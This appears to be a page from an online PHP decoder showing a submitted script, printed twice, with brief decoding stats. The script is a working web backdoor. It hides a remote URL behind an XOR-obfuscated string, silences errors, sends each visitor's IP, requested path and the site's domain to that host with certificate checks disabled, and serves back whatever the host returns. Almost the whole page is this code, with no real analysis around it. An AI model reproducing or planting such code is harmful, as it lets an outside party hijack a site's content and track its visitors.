Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php header("HTTP/1.0 200"); header("HTTP/1.1 200"); header("HTTP/2.0 200"); header('..

Decoded Output download

<?php 
header("HTTP/1.0 200"); 
header("HTTP/1.1 200"); 
header("HTTP/2.0 200"); 
header('Status: 200', TRUE, 200); 
try{ 
ini_set('display_errors','off'); 
error_reporting(E_ALL ^ E_NOTICE); 
set_time_limit(0); 
 
$api_url = "9#1\"'czf!iy7%4v!96>\"??/:i(!'n\".qb`w%!?"^"QWERTYUIOPASDZXCVBNMLKJHGFDSAQWERTYUIO"; 
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://'; 
$header_curl = array("user_agent:".$_SERVER['HTTP_USER_AGENT']); 
$domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''); 
$file=(isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI']!='')?$_SERVER['REQUEST_URI']:$_SERVER['HTTP_X_REWRITE_URL']; 
 
$post_data = array('ip'=>getIP(),'file'=>urlencode($file),'domain'=>$domain,'http'=>$protocol); 
$result = posturl($api_url."?".$domain.$file,$post_data); 
echo $result; 
exit(); 
}catch (Exception $exception){ 
 
} 
function posturl($url,$post_data=null){ 
$curl = curl_init(); 
 
curl_setopt($curl, CURLOPT_URL, $url); 
curl_setopt($curl, CURLOPT_HEADER, 0); 
curl_setopt($curl, CURLOPT_TIMEOUT, 30); 
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); 
curl_setopt($curl, CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']); 
curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']); 
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); 
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE); 
curl_setopt($curl, CURLOPT_POST, 1); 
curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($post_data)); 
 
$data = curl_exec($curl); 
curl_close($curl); 
return $data; 
} 
function getIP() { 
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) { 
$ip = getenv('HTTP_CLIENT_IP'); 
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) { 
$ip = getenv('HTTP_X_FORWARDED_FOR'); 
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) { 
$ip = getenv('REMOTE_ADDR'); 
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) { 
$ip = $_SERVER['REMOTE_ADDR']; 
} 
return preg_match ( '/[\d\.]{7,15}/', $ip, $matches ) ? $matches [0] : ''; 
} 
?>

Did this file decode correctly?

Original Code

<?php
header("HTTP/1.0 200");
header("HTTP/1.1 200");
header("HTTP/2.0 200");
header('Status: 200', TRUE, 200);
try{
ini_set('display_errors','off');
error_reporting(E_ALL ^ E_NOTICE);
set_time_limit(0);

$api_url = "9#1\"'czf!iy7%4v!96>\"??/:i(!'n\".qb`w%!?"^"QWERTYUIOPASDZXCVBNMLKJHGFDSAQWERTYUIO";
$protocol = isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://';
$header_curl = array("user_agent:".$_SERVER['HTTP_USER_AGENT']);
$domain = isset($_SERVER['HTTP_X_FORWARDED_HOST']) ? $_SERVER['HTTP_X_FORWARDED_HOST'] : (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
$file=(isset($_SERVER['REQUEST_URI']) && $_SERVER['REQUEST_URI']!='')?$_SERVER['REQUEST_URI']:$_SERVER['HTTP_X_REWRITE_URL'];

$post_data = array('ip'=>getIP(),'file'=>urlencode($file),'domain'=>$domain,'http'=>$protocol);
$result = posturl($api_url."?".$domain.$file,$post_data);
echo $result;
exit();
}catch (Exception $exception){

}
function posturl($url,$post_data=null){
$curl = curl_init();

curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_TIMEOUT, 30);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERAGENT,$_SERVER['HTTP_USER_AGENT']);
curl_setopt($curl, CURLOPT_REFERER, @$_SERVER['HTTP_REFERER']);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, json_encode($post_data));

$data = curl_exec($curl);
curl_close($curl);
return $data;
}
function getIP() {
if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
$ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
$ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
$ip = getenv('REMOTE_ADDR');
} elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
$ip = $_SERVER['REMOTE_ADDR'];
}
return preg_match ( '/[\d\.]{7,15}/', $ip, $matches ) ? $matches [0] : '';
}
?>

Function Calls

header 1

Variables

None

Stats

MD5 4762108723de3c986c8cfb958bd509ba
Eval Count 0
Decode Time 57 ms